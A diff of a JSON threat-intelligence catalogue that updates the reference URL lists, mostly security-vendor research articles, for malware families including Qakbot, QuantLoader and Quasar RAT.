- "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/",
- "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
- "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm",
- "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/",
- "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot",
- "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.youtube.com/watch?v=iB1psRMtlqg",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/",
- "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
- "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
- "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "http://www.secureworks.com/research/threat-profiles/gold-lagoon",
- "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf",
- "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view",
- "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
- "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
- "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails",
- "https://twitter.com/ChouchWard/status/1405168040254316547",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
- "https://www.youtube.com/watch?v=M22c1JgpG-U",
- "https://isc.sans.edu/diary/rss/28448",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
- "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware",
+ "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/",
+ "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
"https://twitter.com/elisalem9/status/1381859965875462144",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://www.malwarology.com/posts/2-qakbot-conf-extraction/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques",
+ "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://isc.sans.edu/diary/rss/28568",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html",
+ "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a",
"https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
- "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/"
+ "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
+ "https://twitter.com/tylabs/status/1462195377277476871",
+ "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html",
+ "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
+ "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan",
+ "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
+ "https://www.youtube.com/watch?v=OCRyEUhiEyw",
+ "https://www.elastic.co/security-labs/qbot-configuration-extractor",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://isc.sans.edu/diary/rss/28728",
+ "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
+ "http://contagiodump.blogspot.com/2010/11/template.html",
+ "https://syrion.me/malware/qakbot-bb-extractor/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/",
+ "https://www.malwarology.com/2022/04/qakbot-series-process-injection/",
+ "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/",
+ "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/",
+ "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.malwarology.com/posts/2-qakbot-conf-extraction/",
+ "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/",
+ "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/",
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/",
+ "https://www.youtube.com/watch?v=M22c1JgpG-U",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html",
+ "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb",
+ "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
+ "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/",
+ "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
+ "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html",
+ "https://twitter.com/Corvid_Cyber/status/1455844008081641472",
+ "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
+ "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/",
+ "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/_alex_il_/status/1384094623270727685",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://twitter.com/TheDFIRReport/status/1361331598344478727",
+ "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
+ "https://bin.re/blog/the-dga-of-qakbot/",
+ "https://isc.sans.edu/diary/rss/28448",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://www.elastic.co/security-labs/qbot-malware-analysis",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
+ "https://www.elastic.co/de/security-labs/qbot-malware-analysis",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://twitter.com/Unit42_Intel/status/1461004489234829320",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/",
+ "https://www.youtube.com/watch?v=iB1psRMtlqg",
+ "https://twitter.com/kienbigmummy/status/1460537501676802051",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
+ "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view",
+ "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot",
+ "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware",
+ "http://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://redcanary.com/blog/intelligence-insights-december-2021",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://www.group-ib.com/blog/egregor",
+ "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
+ "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
+ "https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/",
+ "https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php",
+ "https://securelist.com/qakbot-technical-analysis/103931/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
+ "https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://www.youtube.com/watch?v=4I0LF8Vm7SI",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.malwarology.com/posts/4-qakbot-api-hashing/",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://www.circl.lu/pub/tr-64/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://hatching.io/blog/reversing-qakbot",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://blog.quosec.net/posts/grap_qakbot_navigation/",
+ "https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
+ "https://blog.quosec.net/posts/grap_qakbot_strings/",
+ "https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
+ "https://www.um.edu.mt/library/oar/handle/123456789/76802",
+ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
+ "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
+ "https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.linkedin.com/posts/zayedaljaberi_hunting-recent-qakbot-malware-activity-6903498764984606720-2Gl4",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
+ "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.malwarology.com/posts/3-qakbot-process-injection/",
+ "https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga",
+ "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
+ "https://twitter.com/ChouchWard/status/1405168040254316547",
+ "https://www.techtimes.com/articles/274190/20220412/qbot-botnet-deploys-malware-payloads-through-malicious-windows-installers.htm",
+ "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta",
+ "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
+ "https://asec.ahnlab.com/en/44662/",
+ "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://lab52.io/blog/bypassing-qakbot-anti-analysis-tactics/",
+ "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://www.rapid7.com/blog/post/2023/04/18/automating-qakbot-detection-at-scale-with/",
+ "https://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
+ "https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails",
+ "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
+ "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
+ "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs"
],
"synonyms": [
"Oakboat",
@@ -37610,15 +39621,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
- "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
"https://twitter.com/Arkbird_SOLG/status/1458973883068043264",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
],
"synonyms": [],
"type": []
@@ -37631,76 +39642,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
- "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
- "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
- "https://blog.minerva-labs.com/trapping-quasar-rat",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
- "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
- "https://twitter.com/struppigel/status/1130455143504318466",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html",
- "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
- "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://asec.ahnlab.com/en/31089/",
"https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
+ "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
